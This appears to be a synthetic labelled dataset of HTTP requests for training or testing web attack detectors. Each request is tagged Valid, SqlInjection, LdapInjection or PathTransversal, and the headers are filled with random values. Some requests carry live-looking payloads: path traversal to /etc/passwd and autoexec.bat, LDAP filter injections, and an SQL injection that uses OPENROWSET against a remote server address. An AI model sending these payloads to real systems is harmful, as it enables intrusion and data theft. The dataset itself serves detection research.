User-Agent: Mozilla/8.7 (X11; U; SunOS sun4u 3.1; nr-gq; rv:3.5.7) Gecko/26467064
UA-CPU: x86
UA-Disp: 7333,3930,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 505x3714
Via: sYSaf/4.6 www.goyiH.jpg, Comnnt/0.1 193.127.191.14, 9.3 www.n2dl9R.html
Transfer-Encoding: ritRho; k8mEhapt=odnhnw
Upgrade: inat/2.9, rRci/3.1
Warning: 467 www.tdg5nr4l.html "oeyrenerrdinare" "Wed, 14 Oct 09 08:48:15 GMT"
X-Forwarded-For: 175.189.142.174
X-Serial-Number: 8528165138107530
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 3494
Start - Id: 24475
class: Valid
GET /nmdetglnas/ss5psftn9a4see/g9.XETqJzFyL1c/vmzkwal14JpC_gVkz/Phboot.iniautoexecx/rRclniJda/raoenogltfh8nty/lZwxRr2bA21rS/pdwmxMTntd/v.3/fen.htm? HTTP/1.0
Host: www.eeEr3.it
Connection: cqndt
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: feotT-rOeaEs;q=0.2, fist-s
Cache-Control: no-cache
Client-ip: 105.27.166.52
Cookie: faafdb2=04726;skiawhonBasi6i=2706041;eeoafENw=As;BtIYd8SseS=688
Cookie2: $Version="4"
Date: Sun, 21 Feb 10 20:42:47 GMT
ETag: W/"mkOtG1I.p3Ixo2X"
Expect: tiew
From: grtsaui@oahrelty.gov
If-Modified-Since: Sat, 02 Oct 04 02:12:49 GMT
If-Unmodified-Since: Tue, 25 Dec 07 11:51:32 GMT
If-Match: "Dz9siQHmFBmaoMXon7"
If-None-Match: *
If-Range: "v4W_@Ex9c9F.4Kx5TtN"
Max-Forwards: 813
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest opaque="lcmmeain"
Authorization: m2sst 6diipkh=ooetd2
Range: 10-87
Referer: http://lkjt.gov/dave/awOhmn/ovd0p/orde/i7ineuf.pdf
TE: deflate,trailers
Trailer: Range
User-Agent: Mozilla/6.1 (Machintosh; U; Mac OS X 0.1; hQ-TW; rv:6.0.0) Gecko/18740253
UA-CPU: Sparc
UA-Disp: 200,0703,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 302x1499
Via: 7.5 66.51.62.187
Transfer-Encoding: deflate
Upgrade: rdeg/3.6, 4amlzd/2.4, ctceO1/0.6
Warning: 223 214.116.16.145 "vyen6nwlaqe6vllsme" "Thu, 15 Feb 07 01:20:59 CET"
X-Forwarded-For: 213.50.40.93
X-Serial-Number: 280722107
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24475
Start - Id: 38875
class: LdapInjection
GET /sxItmm.dll?PzO99=719&rarTkmi4Sm=589872&ruegFonGs=tLplt&uz9eep8hiieuh3b=iML-Nho5Mb&kexecqWM=82409871&mysLdO=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&ltoZ6op=d6axF&aecAlmu=ylinkncEj&rechoNSRB=9025776877&_GV-J94img=bedy+1t HTTP/1.0
Host: 137.41.59.84
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.3, gzip;q=0.7, gzip;q=0.3
Accept-Language: o5-06Anng
Cache-Control: min-fresh=8
Client-ip: 9.41.106.201
Cookie: az3eddc3btei=3allL:;ltu8yo844HuTdmq=wt8igrewis4m;gichp=ot7sel;lmcserPaw=32960;nintrzcdFate=91;WLs6kEU=snsyyeacy Rbgsound
Cookie2: $Version="37"
Date: Tue, 01 Apr 08 16:35:58 GMT
ETag: W/"b76tKsiEpdhYw3@"
Expect: aetlNI
From: w08rh3@rpehekeyi.com
If-Modified-Since: Thu, 23 Sep 04 14:05:10 CET
If-Unmodified-Since: Tue, 22 Jan 08 22:51:23 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 28 Nov 09 05:06:25 UTC
Max-Forwards: 62
MIME-Version: 2.9
Pragma: a=pybortsb
Proxy-Authorization: Digest nc=7636d743
Authorization: tspn yuzm=loeg4eo
Range: 15934-,799-8058,-81465
Referer: http://tqRdj.be/seieaw/lldabgy/OTlut/untIudLd/naiooTet.txt
TE: trailers
Trailer: Via
User-Agent: 6Ense0kt/9.7.5.3.1
UA-CPU: PowerPC
UA-Disp: 117,0811,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 279x383
Via: 0.5 www.etnoioe.png, FTP/4.9 172.192.8.148
Transfer-Encoding: deflate
Upgrade: ie8dt4/3.8, nnn/9.0
Warning: 605 205.123.17.49:63776 "cb6tsipI2WEtibtnMi" "Mon, 26 Sep 05 17:29:00 CET"
X-Forwarded-For: 187.158.7.224
X-Serial-Number: 9521103915785136495
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38875
Start - Id: 36166
class: PathTransversal
GET /nL2rXgLm7_xs/Pdfrmsyptre5/1hwnttz/nlweItteerivinie0r.asp?Gjul5Iibhxoo=5910957&Ht=216253&laOo9ahoinxtln=vbscripteeLa9p0esseti&maesaom3=%5Cautoexec.bat&iEhsehtqe6atLl=a&6tnRLn2sstO0i=9&8trell=8ttAsmeint9EE&au=k HTTP/1.0
Host: www.Iiaotua.de
Connection: close
Accept: text/xml, image/*;q=0.5
Accept-Charset: iso-8859-3, x-mac-chinesesimp;q=0.9
Accept-Encoding: deflate;q=0.4
Accept-Language: hic-p, Mot-P;q=0.0, hsee4-oaf8c, StdepnnD-mue;q=0.7
Cache-Control: 2s4eh=ie
Client-ip: 219.216.59.226
Cookie: ddnqtAhtmauphpa=bt;cyoe1maddtaimr=(h/ealysdeconnect1;rek5r898d=116387;tipoxdtr=conh
Date: Thu, 04 Dec 08 02:32:14 GMT
ETag: W/"Ur6v1GbQqi5Fpv3B_GUc"
Expect: ojnuth
From: esie@ntoatbni.fr
If-Modified-Since: Fri, 13 May 05 19:19:39 CET
If-Unmodified-Since: Wed, 12 Jul 06 01:36:17 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 13 Jul 04 08:37:32 UTC
Max-Forwards: 16
Pragma: teteoR7b='ieeRBnn'
Proxy-Authorization: Digest nonce
Authorization: Digest nc=b5e6dAC4
Range: 883-12,6163-,33622-
Referer: /rtydki/9ohsm/mehoh/mqesm7/YaHsin.cfm
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/2.0 (Machintosh; U; PPC 2.3; Wt-1e; rv:3.2.1) Gecko/29666609
UA-Disp: 4206,422,32
UA-Color: color32
UA-Pixels: 5546x388
Via: 7.8 27.46.195.168, 8.8 10.97.140.165, 1.0 127.166.226.111
Transfer-Encoding: compress
Upgrade: C3i8o/9.8, dE3eo/7.9, TnYASd/9.7, toep/4.2
Warning: 176 103.233.4.139 "gothscr7a4n" 
X-Forwarded-For: 42.90.242.122
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36166
Start - Id: 31116
class: Valid
GET /pz02bIkJVqzTPQV1g/tuXx..TglFSCvY24s1.gif? HTTP/1.0
Host: www.hyi8iton.biz
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-8859-2;q=0.0, big5
Accept-Encoding: 
Accept-Language: *
Cache-Control: w='2Neom'
Client-ip: 148.177.138.70
Cookie: hoRll=427412;0snoat=ihw3;etctxmo35=t1s8QhUXnh;oVtkamRKLupdatebc=n;nmactndlHaa=t5Ydocumenty
Cookie2: $Version="98"
Date: Thu, 06 Dec 07 06:12:46 GMT
ETag: W/"X8IqT4uU2JG9mV1H"
Expect: 100-continue
From: ymshapre@ekifwm.com
If-Modified-Since: Tue, 27 Jan 09 09:16:23 UTC
If-Unmodified-Since: Tue, 24 Feb 09 22:29:53 GMT
If-Match: "K5_WB@qFU6Z@dIk_ZgB"
If-None-Match: *
If-Range: "WAPKjFhqDeuPVes"
Max-Forwards: 087
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic clNjbzpuNWVl
Authorization: Rtdng vlyb=aebDlmt
Range: -245173,089218-6894
Referer: /trtbtE.gz
TE: trailers
Trailer: TE
User-Agent: Mozilla/1.2 (Machintosh; U; PPC 6.9; me-kz; rv:0.5.3) Gecko/75160428
UA-CPU: MIPS
UA-Disp: 501,589,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2629x943
Via: FTP/9.9 www.eauety.jpeg, 9.4 www.twthcee7.js:08
Transfer-Encoding: deflate
Upgrade: Vpd/5.7, eiJ/4.6, lehe/1.0
Warning: 550 www.nnascs.js "Fnawrirehedss" 
X-Forwarded-For: 38.240.20.147
X-Serial-Number: 16589272146
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31116
Start - Id: 27226
class: Valid
GET /oMJoueEthbes4su/iK7yKhuzF@/ymprTrboentv.dll?betweenLselectcopy_=335262 HTTP/1.1
Host: www.ytnn.cz
Connection: keep-alive
Accept: audio/basic;q=0.8, image/*;q=0.6
Accept-Charset: *
Accept-Encoding: gzip;q=0.9, deflate
Accept-Language: ohmzvhio-8ed9ei, t-rtcw;q=0.6, wm1sso-tiRoo3aa;q=0.6, arsow-wht92her
Cache-Control: upvaie=tYd
Client-ip: 118.249.27.115
Cookie: osei6Nouozw=008981131;xalertnde=569;qinsertnodecopykR=a;U1wVdocumentVOHsUg=noj;isiad5L=dseoor5
Cookie2: $Version="0"
Date: Sun, 12 Feb 06 18:55:08 CET
ETag: W/"uuyM-6FilYWqa@Bq"
Expect: 100-continue
From: swk0qTsy@7ydemyi.com
If-Modified-Since: Wed, 11 Oct 06 12:27:26 CET
If-Unmodified-Since: Tue, 16 May 06 13:08:20 UTC
If-Match: "Tb6VM-cz7viRD0T66dU2"
If-None-Match: *
If-Range: Sat, 16 Feb 08 13:54:36 GMT
Max-Forwards: 4
MIME-Version: 1.9
Pragma: 5seo='ib'
Proxy-Authorization: NTLM c3Jja3ZsZDJsbGF3aTAxYzdydGUwb2hlbmxjMjRtY3Roc3JUdW8=
Authorization: NTLM aGVIbjBzczRld29qNVRzZGVpZW1lc1NuN3VhaGdrZWk=
Range: -916,-3,-01
Referer: /sdeho/iaha5v/adtoo.mpg
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/8.7 (Machintosh; U; Mac OS X 1.9; oe-hd; rv:0.1.3) Gecko/18286237
UA-CPU: 68000
UA-Disp: 4043,642,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0571x6226
Via: xnslD/6.8 60.253.43.181, HTTP/3.8 www.sdlc.html
Transfer-Encoding: deflate
Upgrade: nnr3no/2.4, ssa6/6.6, nrmmhe/0.5, dTflr/9.1
Warning: 294 125.68.204.148 "qsD6esueacnn6pawXhhU" 
X-Forwarded-For: 20.1.206.31
X-Serial-Number: 907247306873
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27226
Start - Id: 13683
class: Valid
GET /8tt8arHdeatg/eO7I00b/akaeroeha6/ko4rt/eQV.cfm?Ar8crhleEttdenu=7VquEE_.&sjxeaeuc=0348&rmoIXsrY=+myanda&feico=918867&mmi6fthd=2239200&Nel7ennenai=w&l5e0woth=kzmeta++e&e5ihuha=rO8hpq&7atin=yestsiSrrAaly&eisinoetgraZdeg=9027615062&jsasrf=Taeeloioej&wxcjo38a=5351557&ra7c1rjoPq=Et HTTP/1.1
Host: 49.1.53.23
Connection: rkbrmeps
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: t-pt1;q=0.4, sglNlPma-ohntlroo;q=0.0
Cache-Control: min-fresh=93076
Client-ip: 106.218.100.226
Cookie: p8id3tui=rtNur8coheuitlnh;NJOqdqtKADx0=61272;yheeycl=uHKdPb1e8.r-;ri2roz=tZzeVu
Cookie2: $Version="4"
Date: Mon, 26 Apr 04 04:25:23 CET
ETag: "r9hc6qc.ObpsPh1J"
Expect: 100-continue
From: oo7g4l@pAu9fultst.biz
If-Modified-Since: Sat, 10 Jan 09 10:19:49 UTC
If-Unmodified-Since: Sat, 07 Jun 08 11:39:15 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 616
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Basic c251dXl0OmdoempzdQ==
Authorization: s0oiHh O7Mzit=q03lD
Range: 414-787974,03-2,3-3
Referer: http://www.atdvtir.gov/baui8bed.php
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/1.1 (Windows; U; WinNT 4.5; ni-te; rv:4.7.9) Gecko/70628735
UA-CPU: PowerPC
UA-Disp: 2040,5971,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 757x935
Via: 2.5 www.eob6m.css
Transfer-Encoding: identity
Upgrade: ztst8/6.0, emn/7.0, die/9.5
Warning: 810 233.40.240.2:75910 "hppilonufanrr5o" "Tue, 05 Oct 04 06:33:59 UTC"
X-Forwarded-For: 145.31.187.12
X-Serial-Number: 02500062912801761
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 13683
Start - Id: 6712
class: Valid
POST /ohf0rssxmt9npcj/hentjeath7i/wuadIR1G.png? HTTP/1.0
Content-Length: 121
Content-Language: ra,c5rzprod,p
Content-Encoding: deflate
Content-Location: http://seeEti.st/lmna68o/wachieta/aeemEp.zip
Content-MD5: dnJlZXQ1bGhtaWU1NWRnZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 17 Jul 08 14:43:33 GMT
Last-Modified: Wed, 28 Dec 05 22:37:44 UTC
Host: www.ekam3uRcIa.it
Connection: ouVesz1
Accept: */*;q=0.5
Accept-Charset: hz-gb-2312, utf-7;q=0.5, cp-936
Accept-Encoding: 
Accept-Language: otiitloh-u;q=0.3, o-95ee, shuksiR-mAoEJ;q=0.7, otABdyj-e
Cache-Control: min-fresh=9584
Client-ip: 97.171.127.107
Cookie: ssHNeeJoti=985704;n8hg1sbr1qjita=fiomelUnofetc
Cookie2: $Version="8"
Date: Tue, 20 Apr 04 09:18:06 GMT
ETag: "aG1vrSNm98Vz.yO"
Expect: oaou5dn=st0rhi
From: mclrnIty@tsleicrn.gov
If-Modified-Since: Wed, 21 Mar 07 13:05:34 GMT
If-Unmodified-Since: Mon, 13 Oct 08 18:34:13 CET
If-Match: "NQwgx1JxrOpK_GF5"
If-None-Match: "3m3oVqweg81UvfYy"
If-Range: Wed, 06 Jun 07 09:11:50 GMT
Max-Forwards: 443
MIME-Version: 7.3
Pragma: ub='huPI'
Proxy-Authorization: dsaeS r0s5=eu7h
Authorization: Basic b3J0MUJjOnpsZkZ1VGs=
Range: -06,1117-,939411-320
Referer: /edd2/etierss/rittuof.msf
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/8.2 (X11; U; Open BSD i586 7.5; Rx-en; rv:4.7.4) Gecko/38568067
UA-CPU: Sparc
UA-Disp: 035,576,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1839x456
Via: Lhusso/9.0 115.0.11.89, 9.1 52.115.2.113
Transfer-Encoding: compress
Upgrade: hrutt/6.0, tbuzs/0.5, iar/0.3, u7e4ae/3.3
Warning: 182 www.soIvoae.css "imgoyeeiesse1n" "Sat, 19 Jan 08 03:06:04 CET"
X-Forwarded-For: 6.218.56.206
X-Serial-Number: 688311326706532
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

i-104D_AAnph-8=sh8emdn snSi&dYX4s4BtM=our&rhAbctnee==oO&tMnlp=otAAKg1o7e5&topetIrlnHatd=mtrFhetwhpaet&yS8IIJ=oE0&e8w=55

End - Id: 6712
Start - Id: 18942
class: Valid
GET /hVH9zq1eMOfM/e30VrNQEJSm4iKLp/yatSiqi/updateG0ftpg/t4ATs8w/ap0ssp4ai0qBQ/lOzha43yaH396VqOGr/0srsa1nnec9x/psY/u3/Emacyrn.jpeg?frhtRaUU3ohlatU=iq.&e0ZK=flz+h%3Dhtaccesist55te&liSbhh=0rh&p0auqcit8eyVns=poaglurstln8drnewT&ecisevlcubuqao=98&ne=diIoCGped&5.IsB=8622416199&Ld=a6&tQVqTRy=%3Cimetaur%3Dl&eoto=sieupdatev&eXwraaeqsemnld=l2mr&eaoe=pnQE HTTP/1.1
Host: www.yswrpSE.it
Connection: niai
Accept: video/*;q=0.2, audio/basic;q=0.4
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: v2io-aies, 0-ytn, mnegegq-i;q=0.0, L-ii, peo-xsffe
Cache-Control: no-cache
Client-ip: 248.148.61.44
Cookie: ityruu=tSRmG@zfy;gziTar=sjkhCtqf4291;hou2=vxsvgDMXrPp
Cookie2: $Version="7"
Date: Mon, 03 Nov 08 18:23:47 GMT
ETag: W/"@uw-xpOXGwmC-AX"
Expect: 100-continue
From: yhhrcnd@rmltnrr.ch
If-Modified-Since: Sun, 11 Apr 04 13:56:30 CET
If-Unmodified-Since: Sat, 04 Aug 07 22:53:31 CET
If-Match: "lWYnRZ3DQQu6l4vV5Iq"
If-None-Match: "pl.PVCat-7vAcPHMJ3PA"
If-Range: Thu, 31 Aug 06 06:57:29 GMT
Max-Forwards: 928
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic Z25uZXQ6eXRURGF0dA==
Range: -4
Referer: /eaado/hjaes/ynorct/rtiel.asmx
TE: trailers,chunked,trailers
Trailer: Cache-Control
User-Agent: 1enktneo (oKdW3Ev; oqR8uSekiD; 6vDCXzlIkc)
UA-CPU: x86
UA-Disp: 2836,0618,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2163x0680
Via: 6fnmo/5.7 www.R6ttpuo.jpg, FTP/6.7 www.c1Ail.js, HTTP/8.1 91.127.137.234
Transfer-Encoding: identity
Upgrade: galn/0.4, ss2C/2.0, o7ocRs/3.2
Warning: 692 44.133.112.13:93 "qeioOOte8asoelLtth" "Fri, 29 May 09 16:30:06 CET"
X-Forwarded-For: 85.156.7.96
X-Serial-Number: 27260320301
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18942
Start - Id: 19686
class: Valid
GET /isy8mnEait/mahh0N/eqnEsekesrass/naIm4qlAi0HH19uQ7p/ZlDtT@/1rURN-9uShE/eQ8cBI7-opyMKS/aetoyghhqcisncqs/ewH5_2K/secdeaeaaf4dy5esa.js?4gehuedhhc=rpositionhnodetdwinnt%3A6ruifpi+enii&zemnH0=st3%27rSaalk%3Aee2%29e&NTHJsystemkfFMml=tuxMkNk%40&iosn5ngqovRg2te=48120064&5mT4=aehntLlrNs&Fstdindocument0mNpdropn=sAeeain&9kospj=8647&tdl5bdcfi=u%27c&ataamryoo2s=trpNuJdo0xG&d0HImK=s HTTP/1.1
Host: www.EqqImfrA.st
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: max-stale=417
Client-ip: 25.33.202.208
Cookie: Zq2T6HG4=orOe;SfeTtdtsnc=477371;Wt=Irt
Cookie2: $Version="9"
Date: Thu, 26 Oct 06 12:43:20 CET
ETag: "O90S3RZvs0iyNJ3TSa6"
Expect: 100-continue
From: moea@estmzx.uk
If-Modified-Since: Thu, 27 Jan 05 01:13:31 GMT
If-Unmodified-Since: Thu, 29 Jul 04 12:16:24 UTC
If-Match: *
If-None-Match: "u.sw4eaffbm07UM3"
If-Range: Mon, 02 May 05 21:09:11 CET
Max-Forwards: 5
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: wncf sZiI=mapeesi
Authorization: Basic ZXVsYTloZTE6OXJudA==
Range: 921246-43
Referer: /yn9Ddm/n8heT8/anadzt/7uoTsk.swf
TE: gzip,trailers
Trailer: Host
User-Agent: Mozilla/1.4 (Windows; U; Win 9x 6.6; eT-i8; rv:9.8.2) Gecko/08584449
UA-CPU: x86
UA-Disp: 8275,864,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 246x7710
Via: FTP/7.9 112.230.225.23, HTTP/3.6 18.199.49.98
Transfer-Encoding: ineS
Upgrade: leeo/7.8, ciiam/4.0, wtx/5.6, u8e/9.4
Warning: 503 www.hesa5ol.html:9360 "rpo78l" "Thu, 30 Jun 05 14:07:38 UTC"
X-Forwarded-For: 152.55.56.249
X-Serial-Number: 7592797493312
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 19686
Start - Id: 36130
class: PathTransversal
GET /4Etloqo/aeteifeod/inroeinoaro1uheefjr/TvarVodGC_BZBbimgZX/Hprocessing-instructionidMiframexgjWOa5/HscpsLGVAMwgetd/diuwcnddragduEstor/rvycjy.jpeg?hd4ssjnsnH=prq3keht17Heinas6r&ehetnhe=6rrln&gtelnet-W6w1=76156&ast=jkTwZbM.k&oLLDYA=0F&vd9tRa=rcyform7+ubRlwgethhf%27div&zereha=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&Dreegay=7671&6czeenlnsY=i0&4rp7niin8Ihnchi=36&rvHArgebneOyiwd=h0gee9n HTTP/1.1
Host: www.ahwppi.st
Connection: keep-alive
Accept: */*
Accept-Charset: cp-932, x-mac-arabic;q=0.6, windows-1257, iso-2022-jp
Accept-Encoding: 
Accept-Language: bte-e7eire;q=0.0, f-msr;q=0.6, e-sndwlsr, ut5tw-3mlgd9
Cache-Control: ohtbo='eeatOt'
Client-ip: 77.156.80.102
Cookie: roi=2650526;rrAeq7etoyo1=eCt1oyeIusurewh;aawsnpalgnov7=tfEh
Cookie2: $Version="2"
Date: Tue, 16 Aug 05 12:09:49 GMT
ETag: "O@wdOljLOEMWn41hVasM"
Expect: ieg5
From: regt5wfi@r275i.st
If-Modified-Since: Sat, 12 Aug 06 22:42:33 GMT
If-Unmodified-Since: Sat, 10 Oct 09 11:05:22 CET
If-Match: *
If-None-Match: *
If-Range: "A2JxszXcuc0p9dt-XP"
Max-Forwards: 51
MIME-Version: 5.0
Pragma: oiR='nSrttsQc'
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: dv2sl edbc=qyempezk
Range: -535722,74763-864722,-62713
Referer: http://oosr.be/nfqan/slh8set.conf
TE: deflate;q=0.7,chunked
Trailer: Proxy-Authorization
User-Agent: astnrAarrjjhtrusL
UA-CPU: MIPS
UA-Disp: 0150,960,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7606x3250
Via: 6.9 www.Enamoke.html
Transfer-Encoding: deflate
Upgrade: nhS/5.5, hvnd/7.0, s5HomA/4.0, gonou5/9.7, epl/7.7
Warning: 565 www.Stne8T.html "eAh6" "Thu, 04 Dec 08 18:59:50 UTC"
X-Forwarded-For: 129.108.57.155
X-Serial-Number: 6486734154619358
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36130
Start - Id: 41446
class: SqlInjection
PUT /0BG/nr5fGHh/ac38x/scriptwTvincludeXiAGA9TNpv/sRI6a9qv3RnmI/h8sha7eeoeJ3a1h/Nch/2rdIAnoDlefadm6jdloh/ec/h5V.dll? HTTP/1.0
Content-Length: 395
Content-Language: ldeeues
Content-Encoding: compress
Content-Location: http://www.sldgilu.it/npohEtga/edoe.sh
Content-MD5: c2k2NGRvaXkwd2h5ZGNlbA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 28 Oct 09 17:39:24 UTC
Last-Modified: Mon, 30 Nov 09 04:09:04 GMT
Host: www.l3yem6epaa.de
Connection: tp5loEhn
Accept: */*;q=0.6
Accept-Charset: x-mac-ce;q=0.3, windows-1253;q=0.5, windows-1254, iso-8859-8-i;q=0.7, iso-2022-kr;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 161.91.18.4
Cookie: rnsseeOyn=yerhsoeyeorno0oz;lpCmbtsiie=0127904
Cookie2: $Version="9"
Date: Mon, 06 Nov 06 10:03:03 GMT
ETag: "leLIR_bfgo22sOQ"
Expect: wObo=kcnn
From: svetgtH@ellbmBnam.fr
If-Modified-Since: Sat, 19 Nov 05 24:53:29 CET
If-Unmodified-Since: Sun, 04 Jan 04 17:26:10 GMT
If-Match: *
If-None-Match: "a_YCkpd2EOy2bNf8ohzt"
If-Range: "6Kye32fEwf7@vMgtMT"
Max-Forwards: 65
MIME-Version: 1.3
Pragma: f='eumEehA0'
Proxy-Authorization: Digest uri=http://www.qaseCc.net/doze/ikttvm/5wrye.js
Authorization: Digest realm
Range: 8443-378,0047-
Referer: http://aopr.org/lRhe/ddzfera/eFf7tgd.doc
TE: deflate;q=0.2
Trailer: Date
User-Agent: htlmlthh6/0.6.4.1.9
UA-CPU: MIPS
UA-Disp: 338,3350,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 738x118
Via: HTTP/4.8 14.7.10.11, 5.6 76.230.3.218, lka/0.4 www.ye7aetr.gif
Transfer-Encoding: gzip
Upgrade: oin5s/2.1, itrt/4.7, tsm/7.1
Warning: 671 145.233.120.251 "tiua3dtweorond5gt" 
X-Forwarded-For: 12.79.200.187
X-Serial-Number: 9168693821015244526
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

R34rk3rgwehaui=Arsei&Hw=; insert    into     OPENROWSET( 'SQLoledb','uid=tguo;pwd=EdnsXeee;Network=DBMSSOCN;Address=138.14.18.168,1433;','select   *    from    _sysdatabases'  );   select     *  from    LinkedOrRemoteSrv1.master.dbo.sysdatabases&r8sno=io&irKgT6-GhBj=88724&M7likegACkmochawp-i1=re&CnEk2Y=tsadmineformduoeo&hdeLertce7wn1e=ennlihufyqia4jhn

End - Id: 41446
Start - Id: 38100
class: LdapInjection
GET /uegnodYbaEtenaia/eeatENfrp6bliln/ae43ilzCQpVU-rJl/5xONnLXGF/6eTswttnOhao/eiYs/karlnItLnb4bs/raeZ/r7juWhNGJd9/Ldl/hlcw.sh?gdd=0&anpFtal=%29++++%28+%7C+++%28displayName%3Dhad*%29++++%28name%3D+++had*++++%29%28mail%3Dhad*+%29&tnph-OT=44 HTTP/1.1
Host: www.aTrethh.com
Connection: close
Accept: text/html;q=0.0, audio/*;q=0.0, text/*
Accept-Charset: *
Accept-Encoding: compress;q=0.2, gzip, deflate, identity;q=0.1, gzip;q=0.4
Accept-Language: *;q=0.9
Cache-Control: max-stale=43
Client-ip: 80.51.6.160
Cookie: FNWlykX%ue=621;it4boyScaq=e%40E;cseerasaetrdyah=r+aeammochaxp_+L
Cookie2: $Version="433"
Date: Mon, 25 May 09 07:29:10 CET
ETag: "Zj4yOJLgWxL5jkoqj"
Expect: yzytf=wi36hMoe
From: ehldyeiL@ertsuha.st
If-Modified-Since: Thu, 27 Sep 07 06:45:11 GMT
If-Unmodified-Since: Fri, 26 Aug 05 13:34:26 CET
If-Match: *
If-None-Match: *
If-Range: "YP8E1XEmq3KZJtx"
Max-Forwards: 54
MIME-Version: 1.3
Pragma: Tcj=rt
Proxy-Authorization: Ounls db5m=ee3eth
Authorization: Basic T3N6cXV6bmo6VWpldnRvZQ==
Range: -26705,8389-9530,6-32
Referer: /reae/zsJun.txt
TE: chunked,deflate;q=0.7,trailers
Trailer: Trailer
User-Agent: eeolrnte2o9gnEr
UA-CPU: 68000
UA-Disp: 707,3720,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3700x2595
Via: 6.8 177.60.252.111, 4.2 www.arrzt.css:8512, 5.0 241.22.114.3:419
Transfer-Encoding: deflate
Upgrade: ttyt/8.2, cspny/5.6, dpX8/2.9
Warning: 144 20.10.204.100 "scbn8telndd3" "Sun, 20 Feb 05 17:46:24 UTC"
X-Forwarded-For: 164.220.220.166
X-Serial-Number: 2885123328233620
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38100
Start - Id: 46136
class: PathTransversal
GET /e2hnnwlnethe/sck3ymCWU-MfKRC/l6F/t4siac/aKtSnIAAfVnNzNfAMI/tthdus9ITz/sndaeuhilnipi/h_nevwZPynFF4nyg/9dinh4AnmeitSgudOh/lzH6.L0OfIR04H/o7Iboeoh/56ienrU2ro6c.php3?efud6e7si=zpLh&kmsn7c=3&oow=6sieOe&q6O6MdJct8=5eaefe%3Astxncsw&h3tds=aZ5.w&dmtTRxbnlrdmw=61&y2rtpOu=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&regegNevcka=Ia HTTP/1.1
Host: www.qlen.st:570
Connection: heew
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: compress, compress;q=0.3, identity;q=0.7
Accept-Language: t3oia-n6l3, wne-nlln4s, iYemselo-1tzpbtn;q=0.3
Cache-Control: min-fresh=5
Client-ip: 136.234.111.217
Cookie: aY64kT5=A
Cookie2: $Version="5"
Date: Mon, 12 Apr 10 08:49:07 GMT
ETag: W/"GpXBhJEcBz_@Y8t"
Expect: fozng
From: r9hecgen@ob8h.it
If-Modified-Since: Sun, 16 Nov 08 02:13:07 GMT
If-Unmodified-Since: Sat, 16 Jan 10 02:35:13 UTC
If-Match: "uKJ0-pMXX2Tr5VWZstpU"
If-None-Match: "UZfRrMcX6zPB_Ha3Patl"
If-Range: *
Max-Forwards: 0880
MIME-Version: 0.5
Pragma: iu=t
Proxy-Authorization: NTLM ZmtlMG53bm9pc3N0cDR1aWlhbmF2b2FkaGM1aW5ldGhk
